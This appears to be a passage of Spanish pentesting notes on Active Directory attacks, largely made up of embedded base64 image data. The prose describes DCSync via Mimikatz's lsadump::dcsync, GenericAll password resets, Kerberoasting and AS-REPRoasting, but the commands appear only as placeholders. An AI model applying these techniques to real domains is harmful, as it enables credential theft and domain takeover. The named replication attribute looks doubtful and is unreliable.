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
">
{{CODE_BLOCK_14}}
{{CODE_BLOCK_15}}
# **DCsync**
1. **Simulación de replicación**: Un atacante con los permisos adecuados en un **controlador de dominio** (usualmente, un **Administrador de dominio** o **Administrador de Enterprise**) puede usar herramientas como **Mimikatz** para simular el proceso de replicación de un controlador de dominio.
2. **Extracción de contraseñas**: Al realizar una replicación del dominio, el atacante puede solicitar contraseñas de cuentas, hashes de contraseñas y otros atributos de las cuentas de usuario (como las contraseñas almacenadas en el atributo `msDS-ReplicatorPasswords`).
3. **Uso de herramientas**: **Mimikatz** es una de las herramientas más utilizadas para ejecutar un ataque **DCsync**. Al emplear la funcionalidad de `lsadump::dcsync` en Mimikatz, el atacante puede recuperar las contraseñas de los usuarios de la base de datos de Active Directory, incluida la cuenta de **Administrator** o cuentas con privilegios elevados.
# **Generic All**
- Nos da control total sobre un usuario
- **Por tener GenericAll sobre un grupo no tenemos GenericAll sobre los integrantes**
Para cambiar su contraseña:
{{CODE_BLOCK_16}}
Kerberoast (PRIMERA FORMA)
{{CODE_BLOCK_17}}
AS-REPRoast (SEGUNDA FORMA)
{{CODE_BLOCK_18}}
Podemos añadir al usuario P.AGILA SERVICE ACCOUNTS
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAkYAAAFdCAIAAABpRjX+AAAgAElEQVR4Ae2dCXwNV///U4qWR7XV8n9+7e/xVB/9edrnGUQ7EWGykgiJCBEEkSCWEGKLXez7vgSxRISG2EISl2sJomqJiCX2CNlDCImQ5Zq/26PHdO4iIje5d+7HK6/23LkzZ868z7nznjnnO2dMGJbDHwiAAAiAAAhIgICJBI4BhwACIAACIAACDMtBabhJBQEQAAEQkAgBKE0iFYkLNBAAARAAASgNSgMBEAABEJAIAShNIhWJqzMQAAEQAAEoDUoDARAAARCQCAEoTSIViaszEAABEAABKA1KAwEQAAEQkAgBKE0iFYmrMxAAARAAASgNSgMBEAABEJAIAShNIhWJqzMQAAEQAAEoDUoDARAAARCQCAEoTSIViaszEAABEAABKA1KAwEQAAEQkAgBKE0iFYmrMxAAARAAASgNSgMBEAABEJAIAShNIhWJqzMQAAEQAAEoDUoDARAAARCQCAEoTSIViaszEAABEAABKA1KAwEQAAEQkAgBKE0iFYmrMxAAARAAASgNSgMBEAABEJAIAShNIhWJqzMQAAEQAAEoDUoDARAAARCQCAEoTSIViaszEAABEAABKA1KAwEQAAEQkAgBKE0iFYmrMxAAARAAASgNSgMBEAABEJAIAShNIhWJqzMQAAEQAAEoDUoDARAAARCQCAEoTSIViaszEAABEAABKA1KAwEQAAEQkAgBKE0iFYmrMxAAARAAASgNSgMBEAABEJAIAShNIhWJqzMQAAEQAAEoDUoDARAAARCQCAEoTSIViaszEAABEAABKA1KAwEQAAEQkAgBKE0iFYmrMxAAARAAASgNSgMBEAABEJAIAShNIhWJqzMQAAEQAAEoDUoDARAAARCQCAEoTSIViaszEAABEAABKA1KAwEQAAEQkAgBKE0iFYmrMxAAARAAASgNSgMBEAABEJAIAShNIhWJqzMQAAEQAAEoDUoDARAAARCQCAEoTSIViaszEAABEAABKA1KAwEQAAEQkAgBKE0iFYmrMxAAARAAASgNSgMBEAABEJAIAShNIhWJqzMQAAEQAAEoDUoDARAAARCQCAEoTSIViaszEAABEAABKA1KAwEQAAEQkAgBKE0iFYmrMxAAARAAASgNSgMBEAABEJAIAShNIhWJq7OKItC4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